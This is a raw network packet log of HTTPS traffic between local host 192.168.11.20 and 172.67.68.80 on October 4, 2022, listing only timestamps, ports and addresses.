                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102041006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102204084 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102215052 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102281094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102288961 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102297068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102324009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102432013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102574110 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102613926 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102648020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102794886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102806091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102896929 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102910042 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102942944 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102960110 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103024006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103040934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103204966 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103247881 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103279114 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103538990 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103554010 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103574991 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103801966 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103863955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.103996992 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104027987 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104130030 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104146004 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104212046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104229927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104255915 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104319096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104399920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104444981 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104507923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104552984 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104573965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104685068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104732990 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104763985 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104794979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104943991 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.104994059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105014086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105122089 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105210066 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105233908 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105290890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105314016 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105480909 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105493069 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105518103 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105578899 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105587006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105627060 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105707884 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105726957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105868101 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.105890036 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106075048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106201887 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106232882 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106287003 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106314898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106353045 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106370926 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106419086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106551886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106584072 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106626987 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106664896 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106694937 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106795073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106811047 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106900930 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106928110 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106956959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.106971979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107155085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107219934 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107227087 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107254982 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107352972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107496977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107521057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107553959 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107558966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107667923 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107691050 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107825994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107837915 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107872009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.107892036 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108002901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108019114 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108135939 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108139992 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108175039 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108294010 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108309031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108361006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108376026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108473063 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108531952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108629942 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108652115 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108726978 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108764887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108829021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108851910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108875990 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108997107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.108999968 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109074116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109117031 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109137058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109198093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109296083 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109357119 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109359026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109484911 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109505892 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109533072 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109673977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109683037 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109713078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109898090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.109899998 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110099077 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110100031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110137939 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110197067 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110327959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110372066 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110436916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110507965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110542059 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110549927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110655069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110687971 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110718966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110738993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110835075 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110852003 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110924959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110944033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.110990047 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111148119 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111181021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111217976 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111351967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111366034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111485958 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111514091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111604929 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111609936 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111681938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111696959 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111813068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.111897945 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112041950 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112112045 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112195969 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112257957 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112273932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112356901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112371922 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112510920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112533092 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112565041 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112636089 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112651110 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112767935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112788916 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112807035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112869978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112884998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112919092 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.112956047 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113143921 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113148928 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113199949 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113249063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113418102 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113423109 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113481045 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113503933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113562107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113738060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113858938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113882065 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113965034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.113977909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114015102 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114021063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114053965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114209890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114273071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114319086 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114336014 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114362955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114495993 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114552021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114607096 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114660025 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114671946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114700079 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114929914 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114932060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114954948 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.114973068 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115067005 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115097046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115195990 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115246058 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115263939 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115323067 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115489006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115509033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115602970 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115617990 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115669012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115684032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115719080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115830898 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115847111 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115885019 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.115978956 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116029024 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116043091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116154909 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116275072 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116297960 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116313934 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116486073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116496086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116594076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116605043 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116774082 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116802931 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116863966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116873026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116971970 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.116981983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117144108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117165089 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117248058 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117263079 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117314100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117409945 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117465973 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117575884 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117588997 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117777109 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117863894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117928028 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.117945910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118146896 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118148088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118222952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118235111 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118347883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118514061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118578911 CEST49835443192.168.11.20172.67.68.80
